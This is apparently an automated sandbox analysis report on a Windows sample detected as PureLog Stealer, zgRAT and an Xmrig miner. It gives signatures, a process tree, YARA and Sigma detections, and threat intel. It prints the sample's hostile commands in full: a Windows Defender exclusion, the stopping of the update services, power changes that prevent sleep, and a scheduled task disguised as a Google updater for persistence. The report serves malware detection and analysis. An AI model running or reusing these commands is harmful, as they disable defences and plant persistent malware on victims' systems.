Edit tour

Windows Analysis Report
launcher.exe.bin.exe

Overview

General Information

Sample name:	launcher.exe.bin.exe
Analysis ID:	1587657
MD5:	ff391ed9e21485241544944ec6f4a3f0
SHA1:	bd7b5ce885c4684e05c1e937e46e9ef4ad06548c
SHA256:	619ce969d1ec179adf72a87b08468986fa2cb537229a5e8fd03d00856f502200
Tags:	DCRatexeNyashTeamuser-MalHunter
Infos:

Detection

PureLog Stealer, Xmrig, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Stop multiple services

Suricata IDS alerts for network traffic

Yara detected PureLog Stealer

Yara detected Xmrig cryptocurrency miner

Yara detected zgRAT

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

Contains functionality to compare user and computer (likely to detect sandboxes)

Contains functionality to inject code into remote processes

Contains functionality to inject threads in other processes

Creates a thread in another existing process (thread injection)

Found direct / indirect Syscall (likely to bypass EDR)

Found hidden mapped module (file has been removed from disk)

Hooks files or directories query functions (used to hide files and directories)

Hooks processes query functions (used to hide processes)

Hooks registry keys query functions (used to hide registry keys)

Injects a PE file into a foreign processes

Injects code into the Windows Explorer (explorer.exe)

Installs new ROOT certificates

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies power options to not sleep / hibernate

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Protects its processes via BreakOnTermination flag

Sample is not signed and drops a device driver

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Stops critical windows services

Suspicious powershell command line found

Uses Register-ScheduledTask to add task schedules

Uses powercfg.exe to modify the power settings

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to launch a process as a different user

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates driver files

Creates files inside the system directory

Creates job files (autostart)

Deletes files inside the Windows folder

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops certificate files (DER)

Enables debug privileges

File is packed with WinRar

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found evasive API chain (may stop execution after accessing registry keys)

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Powershell Defender Exclusion

Sigma detected: Startup Folder File Write

Sigma detected: Uncommon Svchost Parent Process

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores large binary data to the registry

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

launcher.exe.bin.exe (PID: 6688 cmdline: "C:\Users\user\Desktop\launcher.exe.bin.exe" MD5: FF391ED9E21485241544944EC6F4A3F0)

hs.exe (PID: 6768 cmdline: "C:\Users\user\AppData\Local\Temp\hs.exe" MD5: 8E222E8F9A186F8D21BF2895E1946853)

dialer.exe (PID: 5852 cmdline: C:\Windows\System32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)

winlogon.exe (PID: 580 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)

lsass.exe (PID: 640 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)

svchost.exe (PID: 2496 cmdline: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 928 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

dwm.exe (PID: 984 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)

svchost.exe (PID: 372 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 404 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 872 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 968 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1048 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

updater.exe (PID: 3836 cmdline: "C:\Program Files\Google\Chrome\updater.exe" MD5: 8E222E8F9A186F8D21BF2895E1946853)

svchost.exe (PID: 1100 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1168 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1212 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1316 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1372 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

DCRatBuild.exe (PID: 6780 cmdline: "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe" MD5: 95AB7F1022401E488C0C50E6E5E8937F)

wscript.exe (PID: 7040 cmdline: "C:\Windows\System32\WScript.exe" "C:\fontdriversavescrt\mxUJuDSBL8uYxNL3S2me9mvpl9XOE7C7oXpLzzbyKUU0.vbe" MD5: FF00E0480075B095948000BDC66E81F0)

launcher.exe (PID: 6848 cmdline: "C:\Users\user\AppData\Local\Temp\launcher.exe" MD5: 158FAFA10D2218AA47999131194736F2)

conhost.exe (PID: 6856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6944 cmdline: C:\Windows\system32\cmd.exe /c pause MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 6788 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6156 cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 6300 cmdline: sc stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 6348 cmdline: sc stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 6404 cmdline: sc stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 5736 cmdline: sc stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 5672 cmdline: sc stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

cmd.exe (PID: 5716 cmdline: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powercfg.exe (PID: 2568 cmdline: powercfg /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

powercfg.exe (PID: 440 cmdline: powercfg /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

powercfg.exe (PID: 6376 cmdline: powercfg /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

powercfg.exe (PID: 6676 cmdline: powercfg /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)

powershell.exe (PID: 5172 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nbpkbwke#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 1136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5672 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 1948 cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 5612 cmdline: sc stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 3648 cmdline: sc stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 1116 cmdline: sc stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

sc.exe (PID: 6832 cmdline: sc stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
xmrig	According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.	No Attribution	https://gridinsoft.com/xmrig https://www.akamai.com/blog/security-research/2024-php-exploit-cve-one-day-after-disclosure https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\fontdriversavescrt\ComComponentDriverInto.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\fontdriversavescrt\ComComponentDriverInto.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Windows\Temp\ylbujkauzmzd.tmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
C:\Windows\Temp\ylbujkauzmzd.tmp	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4cb268:$a1: mining.set_target 0x4c6a48:$a2: XMRIG_HOSTNAME 0x4c8540:$a3: Usage: xmrig [OPTIONS] 0x4c6a20:$a4: XMRIG_VERSION
C:\Windows\Temp\ylbujkauzmzd.tmp	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x4d1241:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
C:\Windows\Temp\ylbujkauzmzd.tmp	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4d17a0:$s1: %s/%s (Windows NT %lu.%lu 0x4d1fc8:$s3: \\.\WinRing0_ 0x4ca4c8:$s4: pool_wallet 0x4c62d0:$s5: cryptonight 0x4c62e0:$s5: cryptonight 0x4c62f0:$s5: cryptonight 0x4c6300:$s5: cryptonight 0x4c6318:$s5: cryptonight 0x4c6328:$s5: cryptonight 0x4c6338:$s5: cryptonight 0x4c6350:$s5: cryptonight 0x4c6360:$s5: cryptonight 0x4c6378:$s5: cryptonight 0x4c6390:$s5: cryptonight 0x4c63a0:$s5: cryptonight 0x4c63b0:$s5: cryptonight 0x4c63c0:$s5: cryptonight 0x4c63d8:$s5: cryptonight 0x4c63f0:$s5: cryptonight 0x4c6400:$s5: cryptonight 0x4c6410:$s5: cryptonight
Click to see the 1 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000003.2396018621.000000000538E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000002B.00000002.2633864515.00007FF69572C000.00000004.00000001.01000000.0000000E.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0000002B.00000002.2633864515.00007FF69572C000.00000004.00000001.01000000.0000000E.sdmp	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x5179e8:$a1: mining.set_target 0x5131c8:$a2: XMRIG_HOSTNAME 0x514cc0:$a3: Usage: xmrig [OPTIONS] 0x5131a0:$a4: XMRIG_VERSION

Unpacked PEs

Source	Rule	Description	Author	Strings
43.2.updater.exe.7ff695774ea0.6.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
43.2.updater.exe.7ff695774ea0.6.raw.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4ceb48:$a1: mining.set_target 0x4ca328:$a2: XMRIG_HOSTNAME 0x4cbe20:$a3: Usage: xmrig [OPTIONS] 0x4ca300:$a4: XMRIG_VERSION
43.2.updater.exe.7ff695774ea0.6.raw.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x4d4b21:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
43.2.updater.exe.7ff695774ea0.6.raw.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4d5080:$s1: %s/%s (Windows NT %lu.%lu 0x4d58a8:$s3: \\.\WinRing0_ 0x4cdda8:$s4: pool_wallet 0x4c9bb0:$s5: cryptonight 0x4c9bc0:$s5: cryptonight 0x4c9bd0:$s5: cryptonight 0x4c9be0:$s5: cryptonight 0x4c9bf8:$s5: cryptonight 0x4c9c08:$s5: cryptonight 0x4c9c18:$s5: cryptonight 0x4c9c30:$s5: cryptonight 0x4c9c40:$s5: cryptonight 0x4c9c58:$s5: cryptonight 0x4c9c70:$s5: cryptonight 0x4c9c80:$s5: cryptonight 0x4c9c90:$s5: cryptonight 0x4c9ca0:$s5: cryptonight 0x4c9cb8:$s5: cryptonight 0x4c9cd0:$s5: cryptonight 0x4c9ce0:$s5: cryptonight 0x4c9cf0:$s5: cryptonight
43.2.updater.exe.7ff69572fa80.5.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
43.2.updater.exe.7ff69572fa80.5.raw.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x513f68:$a1: mining.set_target 0x50f748:$a2: XMRIG_HOSTNAME 0x511240:$a3: Usage: xmrig [OPTIONS] 0x50f720:$a4: XMRIG_VERSION
43.2.updater.exe.7ff69572fa80.5.raw.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x519f41:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
43.2.updater.exe.7ff69572fa80.5.raw.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x51a4a0:$s1: %s/%s (Windows NT %lu.%lu 0x51acc8:$s3: \\.\WinRing0_ 0x5131c8:$s4: pool_wallet 0x50efd0:$s5: cryptonight 0x50efe0:$s5: cryptonight 0x50eff0:$s5: cryptonight 0x50f000:$s5: cryptonight 0x50f018:$s5: cryptonight 0x50f028:$s5: cryptonight 0x50f038:$s5: cryptonight 0x50f050:$s5: cryptonight 0x50f060:$s5: cryptonight 0x50f078:$s5: cryptonight 0x50f090:$s5: cryptonight 0x50f0a0:$s5: cryptonight 0x50f0b0:$s5: cryptonight 0x50f0c0:$s5: cryptonight 0x50f0d8:$s5: cryptonight 0x50f0f0:$s5: cryptonight 0x50f100:$s5: cryptonight 0x50f110:$s5: cryptonight
43.2.updater.exe.7ff695750c40.7.raw.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
43.2.updater.exe.7ff695750c40.7.raw.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x4f2da8:$a1: mining.set_target 0x4ee588:$a2: XMRIG_HOSTNAME 0x4f0080:$a3: Usage: xmrig [OPTIONS] 0x4ee560:$a4: XMRIG_VERSION
43.2.updater.exe.7ff695750c40.7.raw.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x4f8d81:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
43.2.updater.exe.7ff695750c40.7.raw.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x4f92e0:$s1: %s/%s (Windows NT %lu.%lu 0x4f9b08:$s3: \\.\WinRing0_ 0x4f2008:$s4: pool_wallet 0x4ede10:$s5: cryptonight 0x4ede20:$s5: cryptonight 0x4ede30:$s5: cryptonight 0x4ede40:$s5: cryptonight 0x4ede58:$s5: cryptonight 0x4ede68:$s5: cryptonight 0x4ede78:$s5: cryptonight 0x4ede90:$s5: cryptonight 0x4edea0:$s5: cryptonight 0x4edeb8:$s5: cryptonight 0x4eded0:$s5: cryptonight 0x4edee0:$s5: cryptonight 0x4edef0:$s5: cryptonight 0x4edf00:$s5: cryptonight 0x4edf18:$s5: cryptonight 0x4edf30:$s5: cryptonight 0x4edf40:$s5: cryptonight 0x4edf50:$s5: cryptonight
43.2.updater.exe.7ff695710000.4.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
43.2.updater.exe.7ff695710000.4.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x5329e8:$a1: mining.set_target 0x52e1c8:$a2: XMRIG_HOSTNAME 0x52fcc0:$a3: Usage: xmrig [OPTIONS] 0x52e1a0:$a4: XMRIG_VERSION
43.2.updater.exe.7ff695710000.4.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x5389c1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
43.2.updater.exe.7ff695710000.4.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x538f20:$s1: %s/%s (Windows NT %lu.%lu 0x539748:$s3: \\.\WinRing0_ 0x531c48:$s4: pool_wallet 0x52da50:$s5: cryptonight 0x52da60:$s5: cryptonight 0x52da70:$s5: cryptonight 0x52da80:$s5: cryptonight 0x52da98:$s5: cryptonight 0x52daa8:$s5: cryptonight 0x52dab8:$s5: cryptonight 0x52dad0:$s5: cryptonight 0x52dae0:$s5: cryptonight 0x52daf8:$s5: cryptonight 0x52db10:$s5: cryptonight 0x52db20:$s5: cryptonight 0x52db30:$s5: cryptonight 0x52db40:$s5: cryptonight 0x52db58:$s5: cryptonight 0x52db70:$s5: cryptonight 0x52db80:$s5: cryptonight 0x52db90:$s5: cryptonight
Click to see the 11 entries

Sigma Signatures

Operating System Destruction

Sigma detected: Stop multiple services

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, CommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4088, ProcessCommandLine: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc, ProcessId: 6156, ProcessName: cmd.exe

System Summary

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nbpkbwke#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nbpkbwke#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4088, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nbpkbwke#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }, ProcessId: 5172, ProcessName: powershell.exe

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Source: Process started

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4088, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, ProcessId: 6788, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\launcher.exe.bin.exe, ProcessId: 6688, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dialer.exe, ParentImage: C:\Windows\System32\dialer.exe, ParentProcessId: 5852, ParentProcessName: dialer.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 928, ProcessName: svchost.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\fontdriversavescrt\mxUJuDSBL8uYxNL3S2me9mvpl9XOE7C7oXpLzzbyKUU0.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\fontdriversavescrt\mxUJuDSBL8uYxNL3S2me9mvpl9XOE7C7oXpLzzbyKUU0.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe, ParentProcessId: 6780, ParentProcessName: DCRatBuild.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\fontdriversavescrt\mxUJuDSBL8uYxNL3S2me9mvpl9XOE7C7oXpLzzbyKUU0.vbe" , ProcessId: 7040, ProcessName: wscript.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

